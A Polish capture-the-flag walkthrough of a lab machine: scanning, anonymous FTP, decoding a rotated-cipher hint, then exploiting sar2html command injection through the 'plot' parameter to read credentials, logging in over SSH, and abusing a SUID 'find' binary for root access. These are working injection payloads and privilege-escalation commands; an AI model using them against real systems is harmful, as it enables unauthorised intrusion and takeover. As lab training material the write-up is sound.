Project 21 - Exploit sar2html RCE.
Bit s.


*Rekonesans*
*Enumeracja za pomocą Nmap*
```
nmap -Pn -A -v 10.10.135.208
```
```
PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.18.105.140
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
80/tcp    open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
10000/tcp open  http    MiniServ 1.930 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
|_http-favicon: Unknown favicon MD5: B2074F73AFB26B499B00960755AE14C5
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
```

*Otwarte porty*
```
21/tcp    open  ftp     vsftpd 3.0.3
80/tcp    open  http    Apache httpd 2.4.18 ((Ubuntu))
10000/tcp open  http    MiniServ 1.930 (Webmin httpd)
55007/tcp open  ssh
```

*Logowanie anonimowe jest włączone na tym serwerze FTP.*
```
ftp 10.10.135.208 
name: anonymous
```
*Pobieranie pliku .info.txt*
```
get .info.txt
```
*Kali Linux*
```
ls -al
cat .info.txt    
```
Wygląda to na jakiś rodzaj szyfru obrotowego:
```
Whfg jnagrq gb frr vs lbh svaq vg. Yby. Erzrzore: Rahzrengvba vf gur xrl!
```
*Użycie Shift Cipher*
[Shift Cipher - Online Decoder, Encoder, Solver, Translator (dcode.fr)](https://www.dcode.fr/shift-cipher)

lub

[quipqiup - cryptoquip and cryptogram solver](https://quipqiup.com/)

*The secret message*
```
Just wanted to see if you find it. Pop. Remember: Enumeration is the key!
```

*Sprawdzanie dostępu w systemie CMS*
```
gobuster dir -u 10.10.135.208 -w /usr/share/wordlists/dirb/common.txt
```
```
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.135.208
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/10/10 05:00:31 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 292]
/.htaccess            (Status: 403) [Size: 297]
/.htpasswd            (Status: 403) [Size: 297]
/index.html           (Status: 200) [Size: 11321]
/joomla               (Status: 301) [Size: 315] [--> http://10.10.135.208/joomla/]
/manual               (Status: 301) [Size: 315] [--> http://10.10.135.208/manual/]
/robots.txt           (Status: 200) [Size: 257]                                   
/server-status        (Status: 403) [Size: 301]                                   
                                                                                  
===============================================================
2022/10/10 05:00:59 Finished
===============================================================
```

*Przeglądarka internetowa*
```
http://10.10.135.208/robots.txt
```

Informacje zamieszczone na stronie
```
User-agent: *
Disallow: /

/tmp
/.ssh
/yellow
/not
/a+rabbit
/hole
/or
/is
/it

079 084 108 105 077 068 089 050 077 071 078 107 079 084 086 104 090 071 086 104 077 122 073 051 089 122 085 048 077 084 103 121 089 109 070 104 078 084 069 049 079 068 081 075
```

Te liczby to ASCII. Więc należy zrobić trochę konwersji:
```
ASCII-->Base64-->MD5
```
Niestety brak konkretów.

*Enumeracja za pomocą Gobuster*
```
gobuster dir -u 10.10.135.208/joomla -w /usr/share/wordlists/dirb/common.txt
```

```
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.135.208/joomla
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/10/10 05:06:53 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 299]
/.htaccess            (Status: 403) [Size: 304]
/.htpasswd            (Status: 403) [Size: 304]
/_archive             (Status: 301) [Size: 324] [--> http://10.10.135.208/joomla/_archive/]
/_database            (Status: 301) [Size: 325] [--> http://10.10.135.208/joomla/_database/]
/_files               (Status: 301) [Size: 322] [--> http://10.10.135.208/joomla/_files/]   
/_test                (Status: 301) [Size: 321] [--> http://10.10.135.208/joomla/_test/]    
/~www                 (Status: 301) [Size: 320] [--> http://10.10.135.208/joomla/~www/]     
/administrator        (Status: 301) [Size: 329] [--> http://10.10.135.208/joomla/administrator/]
/bin                  (Status: 301) [Size: 319] [--> http://10.10.135.208/joomla/bin/]          
/build                (Status: 301) [Size: 321] [--> http://10.10.135.208/joomla/build/]        
/cache                (Status: 301) [Size: 321] [--> http://10.10.135.208/joomla/cache/]        
/components           (Status: 301) [Size: 326] [--> http://10.10.135.208/joomla/components/]   
/images               (Status: 301) [Size: 322] [--> http://10.10.135.208/joomla/images/]       
/includes             (Status: 301) [Size: 324] [--> http://10.10.135.208/joomla/includes/]     
/index.php            (Status: 200) [Size: 12484]                                               
/installation         (Status: 301) [Size: 328] [--> http://10.10.135.208/joomla/installation/] 
/language             (Status: 301) [Size: 324] [--> http://10.10.135.208/joomla/language/]     
/layouts              (Status: 301) [Size: 323] [--> http://10.10.135.208/joomla/layouts/]      
/libraries            (Status: 301) [Size: 325] [--> http://10.10.135.208/joomla/libraries/]    
/media                (Status: 301) [Size: 321] [--> http://10.10.135.208/joomla/media/]        
/modules              (Status: 301) [Size: 323] [--> http://10.10.135.208/joomla/modules/]      
/plugins              (Status: 301) [Size: 323] [--> http://10.10.135.208/joomla/plugins/]      
/templates            (Status: 301) [Size: 325] [--> http://10.10.135.208/joomla/templates/]    
/tests                (Status: 301) [Size: 321] [--> http://10.10.135.208/joomla/tests/]        
/tmp                  (Status: 301) [Size: 319] [--> http://10.10.135.208/joomla/tmp/]          
                                                                                                
===============================================================
2022/10/10 05:07:22 Finished
===============================================================
```
Jedynym innym katalogiem jest **/_test**.

*Przeglądarka internetowa*
```
http://10.10.135.208/joomla/_test
```

*Szukanie exploita dla **sar2html***
**sar2html RCE** jest na exploit-db

*Przeglądarka internetowa*
```
http://10.10.135.208/joomla/_test/index.php?plot=;ls

Select Host
log.txt
```
Udało się! Można zobaczyć plik **log.txt**.

Użycie narzedzia cat do odczytu pliku:
```
http://10.10.135.208/joomla/_test/index.php?plot=;cat log.txt

Select Host
login: basterd
password: superduperp@$$
```

*Logowanie do sSH*
```
ssh basterd@10.10.135.208 -p 55007
password: superduperp@$$
```

Przejrzenie pliku backup.sh:
```
cat backup.sh

REMOTE=1.2.3.4

SOURCE=/home/stoner
TARGET=/usr/local/backup

LOG=/home/stoner/bck.log
 
DATE=`date +%y\.%m\.%d\.`

USER=stoner
#superduperp@$$no1knows

ssh $USER@$REMOTE mkdir $TARGET/$DATE


if [ -d "$SOURCE" ]; then
    for i in `ls $SOURCE | grep 'data'`;do
             echo "Begining copy of" $i  >> $LOG
             scp  $SOURCE/$i $USER@$REMOTE:$TARGET/$DATE
             echo $i "completed" >> $LOG

                if [ -n `ssh $USER@$REMOTE ls $TARGET/$DATE/$i 2>/dev/null` ];then
                    rm $SOURCE/$i
                    echo $i "removed" >> $LOG
                    echo "####################" >> $LOG
                                else
                                        echo "Copy not complete" >> $LOG
                                        exit 0
                fi 
    done
     

else

    echo "Directory is not present" >> $LOG
    exit 0
fi
```

Użytkownik:
```
SOURCE=/home/stoner
password: superduperp@$$no1knows
```

*Zmiana użytkownika*
```
su stoner
password: superduperp@$$no1knows

ls -al
cat .secret
Wynik: You made it till here, well done.
```

**Eskalacja uprawnień**
```
sudo -l

Wynik:
User stoner may run the following commands on Vulnerable:
    (root) NOPASSWD: /NotThisTime/MessinWithYa

```
*Wyszukiwanie plików, których bity **SUID** są ustawione.*
**SUID** (**S**et owner **U**ser **ID** up on execution) to specjalny typ uprawnień do pliku nadawany plikowi. Zwykle w systemie Linux/Unix po uruchomieniu program dziedziczy uprawnienia dostępu od zalogowanego użytkownika. Identyfikator SUID jest definiowany jako nadawanie użytkownikowi tymczasowych uprawnień do uruchamiania programu/pliku z uprawnieniami właściciela pliku, a nie użytkownika, który go uruchamia.
```
find / -perm /4000 -type f -exec ls -ld {} \; 2>/dev/null
```
```
-rwsr-xr-x 1 root root 38900 Mar 26  2019 /bin/su
-rwsr-xr-x 1 root root 30112 Jul 12  2016 /bin/fusermount
-rwsr-xr-x 1 root root 26492 May 15  2019 /bin/umount
-rwsr-xr-x 1 root root 34812 May 15  2019 /bin/mount
-rwsr-xr-x 1 root root 43316 May  7  2014 /bin/ping6
-rwsr-xr-x 1 root root 38932 May  7  2014 /bin/ping
-rwsr-xr-x 1 root root 13960 Mar 27  2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-- 1 root www-data 13692 Apr  3  2019 /usr/lib/apache2/suexec-custom
-rwsr-xr-- 1 root www-data 13692 Apr  3  2019 /usr/lib/apache2/suexec-pristine
-rwsr-xr-- 1 root messagebus 46436 Jun 10  2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 513528 Mar  4  2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 5480 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 36288 Mar 26  2019 /usr/bin/newgidmap
-r-sr-xr-x 1 root root 232196 Feb  8  2016 /usr/bin/find
-rwsr-sr-x 1 daemon daemon 50748 Jan 15  2016 /usr/bin/at
-rwsr-xr-x 1 root root 39560 Mar 26  2019 /usr/bin/chsh
-rwsr-xr-x 1 root root 74280 Mar 26  2019 /usr/bin/chfn
-rwsr-xr-x 1 root root 53128 Mar 26  2019 /usr/bin/passwd
-rwsr-xr-x 1 root root 34680 Mar 26  2019 /usr/bin/newgrp
-rwsr-xr-x 1 root root 159852 Jun 11  2019 /usr/bin/sudo
-rwsr-xr-x 1 root root 18216 Mar 27  2019 /usr/bin/pkexec
-rwsr-xr-x 1 root root 78012 Mar 26  2019 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 36288 Mar 26  2019 /usr/bin/newuidmap
```
*Warto zwrócić uwagę na:
-r-sr-xr-x 1 root root 232196 Feb  8  2016 /usr/bin/find*
```
find . -exec chmod 777 /root \;

cd /root
cat root.txt
It wasn't that hard, was it?

```
